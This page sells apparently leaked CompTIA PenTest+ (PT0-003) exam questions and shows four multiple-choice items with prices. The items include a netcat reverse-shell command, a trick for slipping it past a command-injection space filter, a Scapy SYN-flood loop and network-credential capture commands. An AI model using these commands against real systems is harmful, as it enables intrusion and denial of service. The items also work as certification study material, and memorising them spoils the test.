New Year Special 70% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code: Board70

CompTIA PT0-003 Actual Questions

Page: 5 / 9
Question 20

A penetration tester is trying to bypass a command injection blocklist to exploit a remote code execution vulnerability. The tester uses the following command:

nc -e /bin/sh 10.10.10.16 4444

Which of the following would most likely bypass the filtered space character?

Options:

A.

${IFS}

B.

%0a

C.

+ *

D.

%20

Question 21

A penetration tester is authorized to perform a DoS attack against a host on a network. Given the following input:

ip = IP("192.168.50.2")

tcp = TCP(sport=RandShort(), dport=80, flags="S")

raw = RAW(b"X"*1024)

p = ip/tcp/raw

send(p, loop=1, verbose=0)

Which of the following attack types is most likely being used in the test?

Options:

A.

MDK4

B.

Smurf attack

C.

FragAttack

D.

SYN flood

Question 22

A penetration tester needs to collect information over the network for further steps in an internal assessment. Which of the following would most likely accomplish this goal?

Options:

A.

ntlmrelayx.py -t 192.168.1.0/24 -1 1234

B.

nc -tulpn 1234 192.168.1.2

C.

responder.py -I eth0 -wP

D.

crackmapexec smb 192.168.1.0/24

Question 23

A penetration tester is conducting a vulnerability scan. The tester wants to see any vulnerabilities that may be visible from outside of the organization. Which of the following scans should the penetration tester perform?

Options:

A.

SAST

B.

Sidecar

C.

Unauthenticated

D.

Host-based

Page: 5 / 9
Exam Code: PT0-003
Exam Name: CompTIA PenTest+ Exam
Last Update: Dec 22, 2024
Questions: 131
PT0-003 pdf

PT0-003 PDF

$25.5  $84.99
PT0-003 Engine

PT0-003 Testing Engine

$28.5  $94.99
PT0-003 PDF + Engine

PT0-003 PDF + Testing Engine

$40.5  $134.99